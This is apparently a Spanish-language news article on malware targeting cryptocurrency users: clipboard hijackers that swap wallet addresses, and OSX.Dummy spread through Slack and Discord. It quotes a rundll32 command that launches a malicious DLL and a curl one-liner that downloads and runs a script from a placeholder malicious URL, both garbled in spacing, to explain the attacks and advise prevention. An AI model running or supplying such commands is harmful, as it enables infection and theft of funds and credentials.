Lamentablemente los ciberataques al espacio criptográfico están ocurriendo con enorme frecuencia. Mantener una actitud preventiva siempre será la mejor medida que podamos adoptar, sin embargo es importante conocer mas sobre estos ataques recientes.
En estos días está ocurriendo una nueva forma de «cryptohacking» que consiste en un software basado en el Portapapeles de Windows que ha afectado a millones de usuarios de criptomonedas. Es literalmente el terror de las funciones de “copiar” y “pegar” de nuestros sistemas operativos.
Una realidad ineludible y de la cual se aprovechan los cyberdelincuentes es que las direcciones de criptomonedas son por su extensión, un absoluto problema para ser recordadas con facilidad. Este problema se agrava si una persona tiene múltiples direcciones en su billetera, y ello sin mencionar si posee varias billeteras de criptomonedas diversas. De allí que es natural que el usuario use las funciones “Ctrl C” y “Ctrl V” para copiar y pegar su dirección de en una billetera o un intercambio, o cualquier otro sitio en el que esté realizando alguna transacción con criptomonedas.
Este comportamiento tan recurrente y definitivamente inevitable es el que ha motivado a una serie de ciberdelincuentes para crear un malware que está expoliando a muchos usuarios en el mundo. Este nuevo malware se conoce como «CryptoCurrency Clipboard Hijackers«, y básicamente consiste en que el malware monitorea la computadora infectada de una víctima en el software del Portapapeles y, en caso de que se detecte direcciones de criptomonedas guardadas, cambia la dirección de la víctima por una que los atacantes controlan.
Las medidas a adoptar para prevenir que este tipo de ataques logren su cometido radican fundamentalmente en la prudencia y cuidado del usuario, ya que puede verificar dos veces y notar un error en la dirección y cancelar la transacción, y con ello evitar perder su dinero.
A modo de ilustración concreta, el malware ejecuta una Biblioteca de vínculos dinámicos (DLL) del sistema operativo y descarga un archivo d3dx11_31.dll en la carpeta Windows Temp del equipo infectado. Cuando el usuario inicie sesión en su computadora Posteriormente, se ejecutará automáticamente un comando «rundll32 C: \ Users \ [username] \ AppData \ Local \ Temp \ d3dx11_31.dll, includes_func_runnded». Lo demás ya es cuestión de la prudencia del usuario, pero revisar la citada carpeta de Windows no estará de más para eliminar el archivo malicioso.
Otros ataques están ocurriendo también en sitios como Slack y Discord. Los hackers han atacado a los grupos de usuarios centrados en la temática de criptomonedas de estos sitios, infiltrándose en las computadoras con el citado software de «cryptojacking».
Este malware en particular se conoce como OSX.Dummy, está basado en MacOS, y permite la ejecución de código arbitrario en las máquinas en las que se infiltra. El modus operandi de infiltración consiste en que los atacantes se hacen pasar por personas influyentes del grupo de criptomonedas de cada sitio y envían un enlace con el malware. Al producirse la instalación, la aplicación descarga y ejecuta el script binario «cd / tmp && curl -s curl $ MALICIOUS_URL> script && chmod + x script && ./script».
En este ataque las víctimas pertenecen a un foro relacionado con criptomonedas, lo que proporciona a los atacantes acceso directo a direcciones privadas, correos electrónicos, contraseñas y claves de seguridad del usuario, vulnerando todo.
Los aspectos de prevención básicos han de mantenerse siempre, sin embargo mantener un antivirus actualizado, una revisión breve de la RAM en determinados períodos de tiempo para constatar anomalías y otras medidas de seguridad necesarias pueden hacer la diferencia y mantener seguras nuestras criptomonedas.